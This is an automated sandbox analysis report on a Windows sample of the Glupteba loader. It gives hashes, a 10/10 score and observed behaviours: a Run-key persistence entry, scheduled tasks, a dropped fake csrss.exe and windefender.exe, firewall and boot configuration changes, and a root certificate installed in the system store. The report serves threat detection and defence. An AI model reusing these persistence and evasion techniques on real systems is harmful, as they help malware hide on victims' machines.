glupteba | 6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195

Analysis

max time kernel
121s
max time network
129s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
24-05-2022 21:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe
Size

3.9MB
MD5

845ea5e600e1106dad9d929650cda38d
SHA1

790a0fdb2fba67ea44823ecf8ba2eb45203fb781
SHA256

6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195
SHA512

8d60a50a1be2caf13602d26c27610848dc0110824b4ba354e7fdd25d01ab76dee3df8882393a384a92bc6adf80be733586040eca2781eaf01ec1b897a450a778

Score

10^/10

glupteba discovery dropper evasion loader persistence

Malware Config

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4120-131-0x0000000002FC0000-0x00000000036B6000-memory.dmp	family_glupteba
behavioral2/memory/4120-132-0x0000000000400000-0x0000000000D2D000-memory.dmp	family_glupteba
behavioral2/memory/4436-135-0x0000000000400000-0x0000000000D2D000-memory.dmp	family_glupteba
behavioral2/memory/2984-144-0x0000000000400000-0x0000000000D2D000-memory.dmp	family_glupteba

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs

Processes:

svchost.exe

description	pid	process	target process
PID 4280 created 4120	4280	svchost.exe	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe
PID 4280 created 2984	4280	svchost.exe	csrss.exe
PID 4280 created 2984	4280	svchost.exe	csrss.exe
PID 4280 created 2984	4280	svchost.exe	csrss.exe
PID 4280 created 2984	4280	svchost.exe	csrss.exe

Executes dropped EXE 2 IoCs

Processes:

csrss.exepatch.exe

pid process

2984 csrss.exe
1396 patch.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

pid	process
2984	csrss.exe
1396	patch.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WhiteMeadow = "\"C:\\Windows\\rss\\csrss.exe\""	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Modifies boot configuration data using bcdedit 1 IoCs

Processes:

bcdedit.exe

pid process

552 bcdedit.exe

pid	process
552	bcdedit.exe

Drops file in System32 directory 8 IoCs

Processes:

csrss.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	csrss.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A	csrss.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	csrss.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	csrss.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	csrss.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	csrss.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	csrss.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A	csrss.exe

Drops file in Windows directory 4 IoCs

Processes:

6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.execsrss.exe

description	ioc	process
File opened for modification	C:\Windows\rss	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe
File created	C:\Windows\rss\csrss.exe	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe
File created	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe

Program crash 61 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
1900	4120	WerFault.exe	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe
4820	4120	WerFault.exe	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe
2704	4120	WerFault.exe	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe
2656	4120	WerFault.exe	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe
4520	4120	WerFault.exe	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe
3064	4120	WerFault.exe	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe
1272	4120	WerFault.exe	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe
3568	4120	WerFault.exe	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe
3508	4120	WerFault.exe	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe
3500	4120	WerFault.exe	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe
5112	4120	WerFault.exe	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe
3452	4120	WerFault.exe	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe
3748	4120	WerFault.exe	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe
4232	4120	WerFault.exe	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe
2268	4120	WerFault.exe	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe
5032	4120	WerFault.exe	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe
2376	4120	WerFault.exe	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe
2832	4436	WerFault.exe	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe
2172	4436	WerFault.exe	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe
1480	4436	WerFault.exe	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe
4988	4436	WerFault.exe	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe
3420	4436	WerFault.exe	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe
4772	4436	WerFault.exe	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe
3008	4436	WerFault.exe	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe
1512	4436	WerFault.exe	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe
1548	4436	WerFault.exe	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe
4828	2984	WerFault.exe	csrss.exe
2124	2984	WerFault.exe	csrss.exe
3964	2984	WerFault.exe	csrss.exe
1552	2984	WerFault.exe	csrss.exe
3336	2984	WerFault.exe	csrss.exe
3056	2984	WerFault.exe	csrss.exe
4364	2984	WerFault.exe	csrss.exe
3456	2984	WerFault.exe	csrss.exe
3508	2984	WerFault.exe	csrss.exe
3500	2984	WerFault.exe	csrss.exe
4092	2984	WerFault.exe	csrss.exe
3452	2984	WerFault.exe	csrss.exe
4724	2984	WerFault.exe	csrss.exe
3720	2984	WerFault.exe	csrss.exe
4672	2984	WerFault.exe	csrss.exe
4752	2984	WerFault.exe	csrss.exe
3228	2984	WerFault.exe	csrss.exe
848	2984	WerFault.exe	csrss.exe
2172	2984	WerFault.exe	csrss.exe
2092	2984	WerFault.exe	csrss.exe
4904	2984	WerFault.exe	csrss.exe
1868	2984	WerFault.exe	csrss.exe
2752	2984	WerFault.exe	csrss.exe
1484	2984	WerFault.exe	csrss.exe
5108	2984	WerFault.exe	csrss.exe
1548	2984	WerFault.exe	csrss.exe
1828	2984	WerFault.exe	csrss.exe
4568	2984	WerFault.exe	csrss.exe
3152	2984	WerFault.exe	csrss.exe
4572	2984	WerFault.exe	csrss.exe
4000	2984	WerFault.exe	csrss.exe
5024	2984	WerFault.exe	csrss.exe
2892	2984	WerFault.exe	csrss.exe
1552	2984	WerFault.exe	csrss.exe
2912	2984	WerFault.exe	csrss.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

5072 schtasks.exe
1948 schtasks.exe

pid	process
5072	schtasks.exe
1948	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

csrss.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3142 = "South Sudan Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3052 = "Qyzylorda Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3141 = "South Sudan Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2891 = "Sudan Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2612 = "Bougainville Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2792 = "Novosibirsk Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2751 = "Tomsk Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1861 = "Russia TZ 6 Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1661 = "Bahia Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time"	csrss.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

csrss.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	csrss.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	csrss.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46